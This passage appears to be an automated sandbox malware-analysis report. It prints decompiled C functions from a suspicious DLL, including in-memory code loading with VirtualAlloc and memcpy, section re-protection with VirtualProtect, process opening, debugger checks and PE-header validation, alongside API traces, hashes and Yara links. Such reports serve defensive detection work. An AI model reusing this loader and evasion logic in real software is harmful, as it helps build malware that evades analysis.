							_v16 = 0xc;
						} else {
							memcpy(_v36, _v24, _v12);
						}
						VirtualFree(_v24, 0, 0x8000); // executed
					}
				}
				return _v16;
			}

0x6d8e18bb
0x6d8e18cb
0x6d8e18d2
0x6d8e18d5
0x6d8e18ea
0x6d8e18f1
0x6d8e18f6
0x6d8e1907
0x6d8e190a
0x6d8e1912
0x6d8e1915
0x6d8e19bf
0x6d8e191b
0x6d8e191b
0x6d8e191f
0x6d8e1987
0x6d8e1921
0x6d8e1921
0x6d8e1924
0x6d8e1926
0x6d8e192e
0x6d8e1931
0x6d8e1934
0x6d8e193c
0x6d8e1944
0x6d8e1945
0x6d8e1946
0x6d8e194d
0x6d8e194d
0x6d8e1961
0x6d8e1966
0x6d8e196f
0x6d8e1976
0x6d8e1979
0x6d8e197d
0x6d8e1982
0x00000000
0x00000000
0x6d8e1939
0x6d8e1939
0x6d8e1984
0x6d8e1991
0x6d8e19a6
0x6d8e1993
0x6d8e199c
0x6d8e19a1
0x6d8e19b7
0x6d8e19b7
0x6d8e19c6
0x6d8e19cc

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,00000000,?,00000000,?,?,?,?,?,?,6D8E1045,00000000), ref: 6D8E190A
memcpy.NTDLL(?,6D8E1045,?,?,00000000,?,00000000,?,?,?,?,?,?,6D8E1045,00000000), ref: 6D8E199C
VirtualFree.KERNELBASE(6D8E1045,00000000,00008000,?,00000000,?,00000000,?,?,?,?,?,?,6D8E1045,00000000), ref: 6D8E19B7

Strings

Dec 21 2020, xrefs: 6D8E193C

Memory Dump Source

Source File: 00000001.00000002.637913897.000000006D8E1000.00000020.00020000.sdmp, Offset: 6D8E0000, based on PE: true

Associated: 00000001.00000002.637887859.000000006D8E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.637944670.000000006D8E3000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.637966624.000000006D8E5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.637992816.000000006D8E6000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Dec 21 2020
API String ID: 4010158826-582694290
Opcode ID: 874aa7dff5999b9bac84cbe2593450ffb4fb64080a5d6c57c6000274d408d348
Instruction ID: c11b73e7ebe04b411bc9905888e1a2aba34481ee4028054786a3156f71b8a680
Opcode Fuzzy Hash: 874aa7dff5999b9bac84cbe2593450ffb4fb64080a5d6c57c6000274d408d348
Instruction Fuzzy Hash: 3B316F71E0021AAFDF01DF98C884BEEBBB5BF4A344F508569E914A7240D771AA05CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6D8E116E, Relevance: 6.1, APIs: 4, Instructions: 61
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E6D8E116E() {
				char _v28;
				void _v44;
				char _v48;
				void* _v52;
				long _t24;
				int _t25;
				void* _t29;
				intOrPtr* _t31;
				signed int _t34;
				void* _t36;
				intOrPtr _t37;
				int _t41;

				 *0x6d8e4148 =  *0x6d8e4148 & 0x00000000;
				_push(0);
				_push(0x6d8e4144);
				_push(1);
				_push( *0x6d8e4150 + 0x6d8e5084);
				 *0x6d8e4140 = 0xc; // executed
				L6D8E178C(); // executed
				_t34 = 6;
				memset( &_v44, 0, _t34 << 2);
				if(E6D8E1F65( &_v44,  &_v28,  *0x6d8e414c ^ 0xfd7cd1cf) == 0) {
					_t24 = 0xb;
					L7:
					ExitThread(_t24);
				}
				_t25 = lstrlenW( *0x6d8e4138);
				_t7 = _t25 + 2; // 0x2
				_t41 = _t25 + _t7;
				_t10 = _t41 + 8; // 0xa
				_t29 = E6D8E1DBD(_t37, _t10,  &_v48,  &_v52); // executed
				if(_t29 == 0) {
					_t36 =  *0x6d8e4138;
					_t31 = _v52;
					 *_t31 = 0;
					if(_t36 == 0) {
						 *(_t31 + 4) =  *(_t31 + 4) & 0x00000000;
					} else {
						memcpy(_t31 + 4, _t36, _t41);
					}
				}
				_t24 = E6D8E1252(_v44, _t37); // executed
				goto L7;
			}

0x6d8e1179
0x6d8e1184
0x6d8e1186
0x6d8e118b
0x6d8e1193
0x6d8e1194
0x6d8e119e
0x6d8e11a7
0x6d8e11ac
0x6d8e11ca
0x6d8e1229
0x6d8e122a
0x6d8e122b
0x6d8e122b
0x6d8e11d2
0x6d8e11d8
0x6d8e11d8
0x6d8e11e6
0x6d8e11ea
0x6d8e11f1
0x6d8e11f3
0x6d8e11fb
0x6d8e11ff
0x6d8e1205
0x6d8e1217
0x6d8e1207
0x6d8e120d
0x6d8e1212
0x6d8e1205
0x6d8e1220
0x00000000

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,6D8E4144,00000000), ref: 6D8E119E
lstrlenW.KERNEL32(?,?,?), ref: 6D8E11D2

Part of subcall function 6D8E1DBD: GetSystemTimeAsFileTime.KERNEL32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,6D8E11EF,0000000A,?), ref: 6D8E1DCA
Part of subcall function 6D8E1DBD: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6D8E1DE0
Part of subcall function 6D8E1DBD: _snwprintf.NTDLL ref: 6D8E1E05
Part of subcall function 6D8E1DBD: CreateFileMappingW.KERNELBASE(000000FF,6D8E4140,00000004,00000000,?,?), ref: 6D8E1E2A
Part of subcall function 6D8E1DBD: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6D8E11EF,0000000A), ref: 6D8E1E41
Part of subcall function 6D8E1DBD: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6D8E11EF), ref: 6D8E1E76

memcpy.NTDLL(?,?,00000002,0000000A,?,?), ref: 6D8E120D
ExitThread.KERNEL32 ref: 6D8E122B

Memory Dump Source

Source File: 00000001.00000002.637913897.000000006D8E1000.00000020.00020000.sdmp, Offset: 6D8E0000, based on PE: true

Associated: 00000001.00000002.637887859.000000006D8E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.637944670.000000006D8E3000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.637966624.000000006D8E5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.637992816.000000006D8E6000.00000002.00020000.sdmp Download File

Similarity

API ID: DescriptorFileSecurityTime$CloseConvertCreateErrorExitHandleLastMappingStringSystemThread_aulldiv_snwprintflstrlenmemcpy
String ID:
API String ID: 2378523637-0
Opcode ID: 96cecdbcfb5176d24a1e7873cfdeb2624d899d710e950dfc314b4b943008a960
Instruction ID: e667575029d8f72364b7a11fd50c9715b7cec409345e1dbe3cf71bc1292899e9
Opcode Fuzzy Hash: 96cecdbcfb5176d24a1e7873cfdeb2624d899d710e950dfc314b4b943008a960
Instruction Fuzzy Hash: 511137B2608205ABDB01CB68CC4CF9B77ECAB9E348F024929B515D7190E770E548CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6D922FE0, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 205COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(0000FDE9,?), ref: 6D923013

Strings

, xrefs: 6D9230E4
z, xrefs: 6D9232E7

Memory Dump Source

Source File: 00000001.00000002.638035546.000000006D8F0000.00000020.00020000.sdmp, Offset: 6D8F0000, based on PE: false

Similarity

API ID: Info
String ID: $z
API String ID: 1807457897-2251613814
Opcode ID: ee083ddd40cb778d3fb4071f6f871d1549d24ed14ab5abdc983cfe2a8649605f
Instruction ID: 326bf1266ea018cab39cc9ae80b42c241eb7c68853a125321913cfc1148a66cc
Opcode Fuzzy Hash: ee083ddd40cb778d3fb4071f6f871d1549d24ed14ab5abdc983cfe2a8649605f
Instruction Fuzzy Hash: 85A13C70A9825C9BDB16CF98C891BE9BB75FF45304F04C0D9D94D5B286C274AB92CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D8E1CCA, Relevance: 4.6, APIs: 3, Instructions: 69
memoryCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E6D8E1CCA(void* __eax, long __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				long _v16;
				signed int _v20;
				int _t33;
				signed int _t36;
				long _t41;
				void* _t50;
				void* _t51;
				signed int _t54;

				_t41 = __edx;
				_v12 = _v12 & 0x00000000;
				_t36 =  *(__eax + 6) & 0x0000ffff;
				_t50 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v20 = _t36;
				VirtualProtect(_a4,  *(__eax + 0x54), 4,  &_v16); // executed
				_v8 = _v8 & 0x00000000;
				if(_t36 <= 0) {
					L11:
					return _v12;
				}
				_t51 = _t50 + 0x24;
				while(1) {
					_t54 = _v12;
					if(_t54 != 0) {
						goto L11;
					}
					asm("bt dword [esi], 0x1d");
					if(_t54 >= 0) {
						asm("bt dword [esi], 0x1e");
						if(__eflags >= 0) {
							_t41 = 4;
						} else {
							asm("bt dword [esi], 0x1f");
							asm("sbb edx, edx");
							_t41 = ( ~(_t41 & 0xffffff00 | __eflags > 0x00000000) & 0x00000002) + 2;
						}
					} else {
						asm("bt dword [esi], 0x1f");
						asm("sbb edx, edx");
						_t41 = ( ~(_t41 & 0xffffff00 | _t54 > 0x00000000) & 0x00000020) + 0x20;
					}
					_t33 = VirtualProtect( *((intOrPtr*)(_t51 - 0x18)) + _a4,  *(_t51 - 0x1c), _t41,  &_v16); // executed
					if(_t33 == 0) {
						_v12 = GetLastError();
					}
					_t51 = _t51 + 0x28;
					_v8 = _v8 + 1;
					if(_v8 < _v20) {
						continue;
					} else {
						goto L11;
					}
				}
				goto L11;
			}

0x6d8e1cca
0x6d8e1cd4
0x6d8e1cd9
0x6d8e1ce5
0x6d8e1cf2
0x6d8e1cf8
0x6d8e1cfa
0x6d8e1d00
0x6d8e1d6c
0x6d8e1d73
0x6d8e1d73
0x6d8e1d02
0x6d8e1d05
0x6d8e1d05
0x6d8e1d09
0x00000000
0x00000000
0x6d8e1d0b
0x6d8e1d0f
0x6d8e1d24
0x6d8e1d28
0x6d8e1d3e
0x6d8e1d2a
0x6d8e1d2a
0x6d8e1d33
0x6d8e1d39
0x6d8e1d39
0x6d8e1d11
0x6d8e1d11
0x6d8e1d1a
0x6d8e1d1f
0x6d8e1d1f
0x6d8e1d4f
0x6d8e1d53
0x6d8e1d5b
0x6d8e1d5b
0x6d8e1d5e
0x6d8e1d61
0x6d8e1d6a
0x00000000
0x00000000
0x00000000
0x00000000
0x6d8e1d6a
0x00000000

APIs

VirtualProtect.KERNELBASE(00000000,?,00000004,00000002,?,00000002,00000000,?,00000002), ref: 6D8E1CF8
VirtualProtect.KERNELBASE(00000000,00000000,00000004,?), ref: 6D8E1D4F
GetLastError.KERNEL32(?,?), ref: 6D8E1D55

Memory Dump Source

Source File: 00000001.00000002.637913897.000000006D8E1000.00000020.00020000.sdmp, Offset: 6D8E0000, based on PE: true

Associated: 00000001.00000002.637887859.000000006D8E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.637944670.000000006D8E3000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.637966624.000000006D8E5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.637992816.000000006D8E6000.00000002.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: 7e9f152ea5bbab6fde134b9ce59eecf31651a93d7bfcb8dd6b1a9e3de240cdde
Instruction ID: 0c033ddf07e2f9be303a05cbb5c5164e7905b30c9aa1105a1171e738b171a2d5
Opcode Fuzzy Hash: 7e9f152ea5bbab6fde134b9ce59eecf31651a93d7bfcb8dd6b1a9e3de240cdde
Instruction Fuzzy Hash: 4E21D276E00109EFEB208F99C888EEEF7B9FB45355F108959E54057101D3349A89CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6D9236F0, Relevance: 3.3, APIs: 2, Instructions: 297COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.638035546.000000006D8F0000.00000020.00020000.sdmp, Offset: 6D8F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5563fd6fdca6b9a44dd52059d330917c733f9b819e6689b8d101d3945e3a0116
Instruction ID: 1458d787fd65b4b848f484829872ad5ceddf60766804756b0c294a7310d8c4f5
Opcode Fuzzy Hash: 5563fd6fdca6b9a44dd52059d330917c733f9b819e6689b8d101d3945e3a0116
Instruction Fuzzy Hash: 02D13774A2410ADBDF05CFA9C494AAEBBB5BF49308F14C12ED8156B349D339E645CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6D923350, Relevance: 3.1, APIs: 2, Instructions: 135timeCOMMON

Download Yara Rule

APIs

Part of subcall function 6D922E40: GetOEMCP.KERNEL32(00000000), ref: 6D922E75

std::_Timevec::_Timevec.LIBCPMTD ref: 6D9233AB

Memory Dump Source

Source File: 00000001.00000002.638035546.000000006D8F0000.00000020.00020000.sdmp, Offset: 6D8F0000, based on PE: false

Similarity

API ID: TimevecTimevec::_std::_
String ID:
API String ID: 4219598475-0
Opcode ID: 6622d17d5f0317159bc78edfc0cc4356cbba2192c381561ea907c6cd5f5be8f3
Instruction ID: a9ae42ad8a8c06697286d204e778258eecf10526686f30cff19edbc4455573c0
Opcode Fuzzy Hash: 6622d17d5f0317159bc78edfc0cc4356cbba2192c381561ea907c6cd5f5be8f3
Instruction Fuzzy Hash: 6451F271A2820DEBCB06DF64CC91AEE7375BF65318F104298E6156B294EB31EF05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6D8E15F2, Relevance: 2.5, APIs: 2, Instructions: 48
memoryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E6D8E15F2(void* __ecx) {
				void* _v8;
				char _v12;
				signed short _t15;
				char* _t18;
				char* _t25;
				char* _t29;

				_t22 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t25 = 0;
				if(E6D8E1F65( &_v8,  &_v12,  *0x6d8e414c ^ 0x196db149) != 0) {
					if(_v8 == 0) {
						_t29 = 0;
					} else {
						_t29 = E6D8E1D76(_t22, _v8,  *0x6d8e414c ^ 0x6e49bbff);
					}
					if(_t29 != 0) {
						_t15 = E6D8E1B13(_t22); // executed
						_v12 = _t15 & 0x0000ffff;
						_t18 = StrStrIA(_t29,  &_v12); // executed
						if(_t18 != 0) {
							_t25 = 0x657;
						}
					}
					HeapFree( *0x6d8e4110, 0, _v8);
				}
				return _t25;
			}

0x6d8e15f2
0x6d8e15f5
0x6d8e15f6
0x6d8e160c
0x6d8e1615
0x6d8e161a
0x6d8e1633
0x6d8e161c
0x6d8e162f
0x6d8e162f
0x6d8e1637
0x6d8e1639
0x6d8e1641
0x6d8e1649
0x6d8e1651
0x6d8e1653
0x6d8e1653
0x6d8e1651
0x6d8e1663
0x6d8e1663
0x6d8e166e

APIs

StrStrIA.KERNELBASE(00000000,?,?,?,?,00000000,00000000,?,?,?,6D8E1069), ref: 6D8E1649
HeapFree.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,?,?,6D8E1069), ref: 6D8E1663

Memory Dump Source

Source File: 00000001.00000002.637913897.000000006D8E1000.00000020.00020000.sdmp, Offset: 6D8E0000, based on PE: true

Associated: 00000001.00000002.637887859.000000006D8E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.637944670.000000006D8E3000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.637966624.000000006D8E5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.637992816.000000006D8E6000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 959d6d83b4580be16b3b4b11fe4c2dfcd2fd29d56a1c1437f74b5511853227e3
Instruction ID: c067c67cd738858ce5149dd369f38c4f7398f410440f3586bedb1afadadffae7
Opcode Fuzzy Hash: 959d6d83b4580be16b3b4b11fe4c2dfcd2fd29d56a1c1437f74b5511853227e3
Instruction Fuzzy Hash: 90018476A04118BBDF018BA9CC08FAF7BBCAB8A681B050961F915E3154E730DA009FE0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6D925480, Relevance: 40.8, APIs: 22, Strings: 1, Instructions: 600COMMON

Download Yara Rule

APIs

OutputDebugStringW.KERNEL32(6D946B90), ref: 6D9255A4
OutputDebugStringW.KERNEL32(6D946BDC), ref: 6D9255CC
OutputDebugStringW.KERNEL32(6D946BFC), ref: 6D9255D7
OutputDebugStringW.KERNEL32(?), ref: 6D9255E4
OutputDebugStringW.KERNEL32(6D946C0C), ref: 6D9255EF
__aligned_msize.LIBCMTD ref: 6D9256E2
__aligned_msize.LIBCMTD ref: 6D92573E
__aligned_msize.LIBCMTD ref: 6D925778
__aligned_msize.LIBCMTD ref: 6D9257C5
__aligned_msize.LIBCMTD ref: 6D9257FD
__aligned_msize.LIBCMTD ref: 6D9258DD
__aligned_msize.LIBCMTD ref: 6D925919
__cftoe.LIBCMTD ref: 6D92595B
__aligned_msize.LIBCMTD ref: 6D9259A2

Strings

P, xrefs: 6D925C72

Memory Dump Source

Source File: 00000001.00000002.638035546.000000006D8F0000.00000020.00020000.sdmp, Offset: 6D8F0000, based on PE: false

Similarity

API ID: __aligned_msize$DebugOutputString$__cftoe
String ID: P
API String ID: 991747519-3110715001
Opcode ID: 35cfbe195d10bd8673df1c378fcc5cf02f5d8788d9607743889923633333d37c
Instruction ID: eda574532e495d1b9a3dc2ed174ea5e549ba4d03f95b8f5131521871f20d7b75
Opcode Fuzzy Hash: 35cfbe195d10bd8673df1c378fcc5cf02f5d8788d9607743889923633333d37c
Instruction Fuzzy Hash: E732C4B0D54618EBEBA0DF50CC45FEE7778BB59305F00C194E64866286DBB0DA88CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6D8FF610, Relevance: 14.3, APIs: 9, Instructions: 798COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.638035546.000000006D8F0000.00000020.00020000.sdmp, Offset: 6D8F0000, based on PE: false

Similarity

API ID: __nh_malloc
String ID:
API String ID: 2620867233-0
Opcode ID: bcb956f33126d077002785a257d5178095a89c8edfdcf91d5f29aa887c492246
Instruction ID: 848f40b1217c09ef279b280111baccae5bbbc607b01536637699cac66adb0393
Opcode Fuzzy Hash: bcb956f33126d077002785a257d5178095a89c8edfdcf91d5f29aa887c492246
Instruction Fuzzy Hash: 05620D71A047048FDB05CF29D4907AABBF1FF99314F05856ED8999B391EB31E886CB80

Uniqueness

Uniqueness Score: -1.00%

Function 6D92BA90, Relevance: 6.6, APIs: 4, Instructions: 603COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.638035546.000000006D8F0000.00000020.00020000.sdmp, Offset: 6D8F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 445380e65fb25ef882e5168f1e3ccd91398ec057adf9f4d6a3ac1cdb04b72b32
Instruction ID: dfecad39530e89a68cb369850e001a5ef8cae01858213339df97dfe51cd7cb3f
Opcode Fuzzy Hash: 445380e65fb25ef882e5168f1e3ccd91398ec057adf9f4d6a3ac1cdb04b72b32
Instruction Fuzzy Hash: 28629774A149298FDB64CF18CD90BABB7B2BB88316F1181D9D94DA7345DB31AE81CF40

Uniqueness

Uniqueness Score: -1.00%

Function 6D8E166F, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D8E166F() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;

				_t8 =  *0x6d8e4130;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x6d8e413c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 <= 5) {
					_t4 = 0x32;
					return _t4;
				} else {
					 *0x6d8e412c = _t3;
					_t5 = GetCurrentProcessId();
					 *0x6d8e4128 = _t5;
					 *0x6d8e4130 = _t8;
					_t6 = OpenProcess(0x10047a, 0, _t5);
					 *0x6d8e4124 = _t6;
					if(_t6 == 0) {
						 *0x6d8e4124 =  *0x6d8e4124 | 0xffffffff;
					}
					return 0;
				}
			}

0x6d8e1670
0x6d8e167e
0x6d8e1686
0x6d8e168b
0x6d8e16d5
0x6d8e16d5
0x6d8e168d
0x6d8e1695
0x6d8e16d1
0x6d8e16d3
0x6d8e1697
0x6d8e1697
0x6d8e169c
0x6d8e16aa
0x6d8e16af
0x6d8e16b5
0x6d8e16bd
0x6d8e16c2
0x6d8e16c4
0x6d8e16c4
0x6d8e16ce
0x6d8e16ce

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,6D8E1011), ref: 6D8E167E
GetVersion.KERNEL32(?,6D8E1011), ref: 6D8E168D
GetCurrentProcessId.KERNEL32(?,6D8E1011), ref: 6D8E169C
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,6D8E1011), ref: 6D8E16B5

Memory Dump Source

Source File: 00000001.00000002.637913897.000000006D8E1000.00000020.00020000.sdmp, Offset: 6D8E0000, based on PE: true

Associated: 00000001.00000002.637887859.000000006D8E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.637944670.000000006D8E3000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.637966624.000000006D8E5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.637992816.000000006D8E6000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 6077bd0ace5cda1cf2ab35c8628d4bd0d09f3af613f2e5c5199294fa5a289387
Instruction ID: 6d19029e3f1c7d6fa3836fa368791610912a96067d67157096fe1655009c6bb2
Opcode Fuzzy Hash: 6077bd0ace5cda1cf2ab35c8628d4bd0d09f3af613f2e5c5199294fa5a289387
Instruction Fuzzy Hash: EFF04431644300ABEF40AB69AC0D7903BF0A35F762F11041AF249D90E0E3B0C840DF88

Uniqueness

Uniqueness Score: -1.00%

Function 6D921B50, Relevance: 4.7, APIs: 3, Instructions: 223filetimeCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(00000000,00000000,?), ref: 6D921C61
std::_Timevec::_Timevec.LIBCPMTD ref: 6D921C6E
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 6D921E03

Memory Dump Source

Source File: 00000001.00000002.638035546.000000006D8F0000.00000020.00020000.sdmp, Offset: 6D8F0000, based on PE: false

Similarity

API ID: FileFind$FirstNextTimevecTimevec::_std::_
String ID:
API String ID: 2141543823-0
Opcode ID: 0ccad629af5800b88950e43f9c0f7661e29c17d8f05a133cdcac02081df87ca2
Instruction ID: 975831990c43a4c8c710943929631b09f774d86c8be0809ad8a9949fb51c884d
Opcode Fuzzy Hash: 0ccad629af5800b88950e43f9c0f7661e29c17d8f05a133cdcac02081df87ca2
Instruction Fuzzy Hash: 54A1AE71A281298BCB24DF24CC98BEEB375AF96304F5041D9D5196B288DB32DF94CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6D91C480, Relevance: 4.6, APIs: 3, Instructions: 81COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 6D91C580
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6D91C58E
UnhandledExceptionFilter.KERNEL32(6D94511C), ref: 6D91C59B

Memory Dump Source

Source File: 00000001.00000002.638035546.000000006D8F0000.00000020.00020000.sdmp, Offset: 6D8F0000, based on PE: false

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 5e96af6f756fe8837804e494e27cb0f0fb479f9bebce882f5d0756ae7a1309b2
Instruction ID: ad66a9cd0372d83c221aa648560f1227864d1f7a000753a618956caa0f406f08
Opcode Fuzzy Hash: 5e96af6f756fe8837804e494e27cb0f0fb479f9bebce882f5d0756ae7a1309b2
Instruction Fuzzy Hash: 1641D7B5C1522CDBCB25DF64D8887D9BBB8BF18314F1081EAE91D66290E7309B85CF85

Uniqueness

Uniqueness Score: -1.00%

Function 6D8E23C5, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D8E23C5(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x6d8e4178;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x6d8e41c0 = 1;
										__eflags =  *0x6d8e41c0;
										if( *0x6d8e41c0 != 0) {
											goto L60;
										}
										_t84 =  *0x6d8e4178;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x6d8e41c0 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x6d8e4178 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x6d8e4180 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x6d8e417c + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x6d8e4180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6d8e4180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x6d8e41c0 = 1;
							__eflags =  *0x6d8e41c0;
							if( *0x6d8e41c0 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x6d8e4180 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x6d8e4180 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x6d8e41c0 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
